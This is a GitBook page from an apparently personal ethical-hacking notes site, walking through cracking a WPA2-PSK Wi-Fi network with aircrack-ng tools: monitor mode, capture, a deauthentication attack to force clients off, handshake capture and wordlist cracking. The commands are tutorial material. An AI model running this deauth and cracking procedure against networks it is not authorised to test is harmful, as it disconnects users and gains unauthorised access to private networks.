🔐
oneforall
  • Welcome
  • ETHICAL HACKING METHODOLOGY / USUAL AND USEFUL TOOLS
    • Reconnaissance
      • Overview
    • Enumeration
      • Scanning
      • Ports
    • Exploitation
    • Post-exploitation
      • Password cracking
      • File transfers
      • Maintaining access
      • Pivoting
      • Cleaning up & Covering tracks
  • Active Directory
    • Basics
    • Attack vectors
      • Network poisoning
      • SMB services
      • LDAP
      • OSINT
    • Post-compromise
      • Enumeration
        • PowerView
        • Bloodhound
      • Attacks
        • Pass the hash / password
        • Token impersonation
        • Kerberoasting
        • GPP / cPassword
        • Mimikatz
  • WEB
    • TOP 10 OWASP
  • WEB SERVER
    • SQL Injection
    • Authentication
    • OS injection
    • CSRF
  • WIRELESS
    • WPA2 PSK
  • FORENSIC
    • Radare2
    • Obtaining Memory Samples
    • Volatility
    • USB forensic
  • EXPLOIT DEVELOPMENT
    • Buffer Overflow
  • SCRIPTING AND PL
    • HTML
    • C basics
    • Python
      • Libraries & hacking usages
    • Bash basics
      • Hacking usages
    • Powershell basics
    • PHP
  • NETWORK SECURITY
    • Network reminders
    • CCNAv7
      • LAN security concepts
      • Switch security configuration
    • Wireshark
  • MISC
    • VIM basics
    • Metasploit Cheatsheet
    • Common ports & protocols
    • Tmux Cheatsheet
    • Linux reminders
  • STEGANOGRAPHY
    • Steganography
  • Privilege Escalation
    • Linux
    • Windows
  • CRYPTO
    • Encryption
    • Hashing
    • RSA
      • Tools
      • Factorisarion
Powered by GitBook
On this page
  • Hacking process
  • Exploit walkthrough
  • Monitor mode
  • Discover informations
  • Select network and capture data
  • Perform deauth attack
  • Capture WPA handshake
  • Attempt to crack the handshake

Was this helpful?

  1. WIRELESS

WPA2 PSK

Hacking process

  1. Place wireless card into monitor mode

  2. Discover information about network (Channel & BSSID)

  3. Select network and capture data

  4. Perform deauth attack

  5. Capture WPA handshake

  6. Attempt to crack the handshake

Exploit walkthrough

Monitor mode

iwconfig
airmon-ng check kill
airmon-ng start wlan0 #start monitor mode
iwconfig #verify

Discover informations 

airodump-ng wlan0(mon)

#BSSID is the mac address
#PWR is the distance from the device (less the number is more we are close)
#CH is the channel
#ENC is the type (here WPA2)
#ESSID is the name od the SSID, if its hidden only the length is available

Select network and capture data

airodump-ng -c 6 --bssid <BSSID> -w capture wlan0(mon)
# -c for channel
# --bssid target router
# -w filename capture

After that we will see the device attached to the network.

Then to capture the handshake we can wait or to speed this process we have to kick the user connected from the network.

Perform deauth attack

# Open a new tab
aireplay-ng -0 1 -a <BSSID> -c <client_mac_address> wlan0mon
# -0 means deauth and 1 = run one time

Capture WPA handshake

The deauth process start, the WPA handshake should pop up in the other tab. Look at the capture.cap.

Attempt to crack the handshake

aircrack-ng -w <wordlist.txt> -b <BSSID> capture.cap
PreviousCSRFNextRadare2

Last updated 4 years ago

Was this helpful?